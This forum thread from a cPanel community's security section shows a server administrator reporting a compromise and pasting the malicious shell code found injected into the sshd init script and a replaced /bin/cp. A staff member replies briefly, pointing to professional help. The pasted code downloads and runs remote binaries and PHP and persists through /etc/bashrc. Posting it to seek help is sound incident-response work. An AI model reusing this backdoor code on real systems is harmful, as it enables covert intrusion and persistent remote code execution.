The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Server Possibly Compromised

Discussion in 'Security' started by mordormx, Feb 17, 2016.

  1. mordormx

    mordormx Registered

    Joined:
    Nov 6, 2006
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi guys
    today i detect some weird lines in /etc/init.d/sshd at the start function, this is the content

    Code:
    start()
    
    {
    
    [ -x $SSHD ] || exit 5
    
    [ -f /etc/ssh/sshd_config ] || exit 6
    
    # Create keys if necessary
    
    if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
    
    do_rsa_keygen
    
    if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
    
    do_rsa1_keygen
    
    do_dsa_keygen
    
    fi
    
    fi
    
    
    
    
    
    Inject='/etc/bashrc' #/etc/bashrc
    
    Bar='/bin/bar' #/bin/bar
    
    
    if [[ ! -a $Bar ]]; then
    
    wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
    
    chmod 755 bar >/dev/null 2>&1
    
    mv bar $Bar >/dev/null 2>&1
    
    fi;
    
    if ! grep -q $Bar $Inject; then
    
    echo -e "$Bar >/dev/null 2>&1" >> $Inject
    
    fi;
    
    
    if [[ ! grep -q "example.com" /bin/cp ]]; then
    
    cp /bin/cp /bin/copy >/dev/null 2>&1
    
    echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nph
    
    p run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
    
    chmod 755 /bin/cp
    
    fi;
    
    
    Now the content of /bin/cp is
    #!/bin/bash
    
    Inject="/etc/bashrc" #/etc/bashrc
    
    Bar="/bin/bar" #/bin/bar
    
    if [[ ! -a $Bar ]]; then
    
    wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
    
    chmod 755 bar >/dev/null 2>&1
    
    mv bar $Bar >/dev/null 2>&1
    
    fi;
    
    if ! grep -q "$Bar" $Inject; then
    
    echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
    
    fi;
    
    copy
    
    Have any of you experienced this?
    
    Checking this URL http://example.com/Dynamic/g/run.txt
    looks like a very dangerous code, now i have to research for the way it happened.
    
    Any advice or comment?
     
    #1 mordormx, Feb 17, 2016
    Last edited by a moderator: Feb 17, 2016
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,480
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Please don't post actual links or domain names in your posts. Especially those to compromised servers.

    cPanel is unable to assist you with a compromised server, you should seek the assistance of a professional about this.
     
    SysSachin likes this.
Loading...

Share This Page